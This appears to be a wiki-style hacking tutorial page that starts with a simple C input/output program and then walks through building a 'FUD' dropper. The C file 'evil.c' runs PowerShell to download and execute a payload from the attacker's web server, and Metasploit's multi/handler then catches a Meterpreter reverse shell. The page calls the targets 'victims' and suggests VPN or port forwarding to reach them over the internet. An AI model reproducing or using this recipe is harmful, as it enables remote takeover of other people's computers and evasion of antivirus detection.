C Programming
While Assembly gets right down to the core, sometimes higher-level languages can get jobs done a lot faster. Here we will be looking at the one of the most useful programming languages, and using it against our victims in an attempt at exploitation.
The C programming language was created by Dennis Ritchie and Brian Kernighan, respectively. This language is not object-oriented, just like Assembly, and do not expect to have this language mastered; just because you're a god at C++, doesn't mean you can write in this.
Speaking of writing the language, let's take a quick look at reading it.
Input and Output Example
[edit | edit source]Just to quickly illustrate this language's simple features, we'll start by looking at an example application. It will prompt you to "Enter an integer", and then print whatever number you typed, back to you.
#include <stdio.h>
// This is a single-line comment. This is ignored when the code is compiled/run.
int main()
{
int a;
printf("Enter an integer\n"); // Prints text to the screen
scanf("%d", &a); // Reads user input, and sends the data to the integer 'a'
printf("Integer that you have entered is %d\n", a); // %d (decimal) tells it to add the integer 'a' where it had been typed
return 0;
}
Output:
Enter an integer 99 Integer that you have entered is 99 Process returned 0 (0x0) execution time : 1.949 s Press any key to continue
Many more examples of this language can be found here.
Powershell Attack Vector FUD W/ Metasploit & SET
[edit | edit source]Now I will give a tutorial for making a Powershell attack vector with SET on Kali Linux. You can still follow this if you have setoolkit
and gcc
.
This will give you an idea of how easy a good FUD can be made using the C language and it's appropriate compiler: gcc
.
Creating the payload with SET
[edit | edit source]To create the payload, we first need to type the following on a root-privileged terminal:
setoolkit
After giving it time to load, it will present six options. Press '1', and enter to select "Social Engineering Attacks". Then more options will be shown, just key '9' and then hit enter to select the "Powershell Attack Vectors" option. Here it will ask us about an option for the type of Powershell attack vector. We will hit '1' for the "Alphanumeric Shellcode Injector".
- Here it will ask for the attacker's LHOST, simply copy/paste your IP address into the box. (Tip:
ifconfig
will show all your network interfaces, including IP) - Next, it will ask for your LPORT. This time, you can either leave it to it's default (located inside those brackets) by hitting enter, or you can type a random one, but be sure and remember it.
- Finally, it will ask if we want it to start a listener for us. Skip this, we can easily do this later.
- It will then create a file at /root/.set/reports/powershell which you should move to your desktop.
Deploying our payload to the Apache server
[edit | edit source]Now it would be appropriate to upload our new payload to an Apache service, so we can get our C program to download and run on the victim's Powershell.
- First, we will move our x86_powershell_injection.txt to /var/www/html/payload.txt so Apache can find it.
- Next we start Apache with the following command:
service apache2 start
Great, now we're ready to make the virus.
Creating the FUD with C
[edit | edit source]First, open a file named "evil.c" on your Desktop with Vim or Nano. Fill it with the following C source code:
#include <stdio.h>
int main()
{
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('YOURLHOSTHERE/payload.txt')\"");
return 0;
}
Remember to change "YOURLHOSTHERE" with the LHOST you used when creating the payload in SET.
Now we will compile the evil.c file with gcc:
gcc ~/Desktop/evil.c -o ~/Desktop/evil.exe
Now that we've compiled our program into a runnable file, we can start our listener.
Starting the listener
[edit | edit source]Now we can start the Metasploit framework, let's type:
msfconsole
After it loads, type:
use multi/handler
Now we can set these options, like I listed below:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
Obviously, like before, change the LHOST and LPORT to the values you used when making the payload in SET.
Now you can type the following to start the listener:
exploit
Now, when someone runs your evil.exe file you can get a session.
Opening sessions
[edit | edit source]If a session doesn't open automatically, you can type the following to list the number of sessions including their numbers:
sessions -l
And finally, to open a session:
sessions -i 1
Final notes
[edit | edit source]Please remember that this exploit will not work unless the victim is on your LAN. You can test this on victims over the internet by trying one of the options:
- Hamachi (or others)
- VPN
- Port forwarding